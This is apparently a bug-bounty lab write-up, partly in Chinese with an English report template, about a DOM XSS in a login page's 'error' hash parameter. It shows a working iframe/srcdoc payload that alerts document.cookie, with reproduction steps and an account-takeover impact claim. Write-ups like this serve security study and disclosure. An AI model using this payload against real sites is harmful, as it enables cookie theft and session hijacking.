使用賞獵技戰法 https://www.cnblogs.com/sec875/p/18335838
尋找功能點,熟悉功能點,收集引數,觀察正常(提供預期值(對的)或(不對的))與異常(提供非預期值),威脅建模
登入功能點:https://5cc259cfb319-sec875.a.barker-social.com/login
輸入不正確的賬號,觸發錯誤
檢查資料包,重定向到:https://5cc259cfb319-sec875.a.barker-social.com/login#error=1
發現引數值並尋找哪裡使用它:error
GPT一把梭
errorCode = decodeURIComponent(getHashValue("error"))
error不能等於1和2
如果值為其他就會插入到HTML DOM中,常規payload發現div標籤壞事(iframe xss payload 一把梭)
https://5cc259cfb319-sec875.a.barker-social.com/login#error=666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>
英哥歷史報告
l have discovered a DOM XSS vulnerability affecting the endpoint '/login' in the parameter 'error'. The payloed requires no filter bypass and is a simple, ' 666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'> '
You can see a working proof of concept here:
https://5cc259cfb319-sec875.a.barker-social.com/login#error=666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>
To reproduce:
1.Entering an incorrect account number at the login page triggers an error
2.Check the packet and redirect to errer 1: https://5cc259cfb319-sec875.a.barker-social.com/login#error=1
3.Finding the parameter value and finding where to use it: error
Tracking Sources and Sinks: errorCode = decodeURIComponent(getHashValue("error"))
4.You will observe xss executes
Payload used: 666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>
Vulnerable parameter: error
Endpoint/URL: https://5cc259cfb319-sec875.a.barker-social.com/login#error=666<iframe srcdoc='<script src="data:text/javascript,alert(document.cookie)"></script>'>
lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.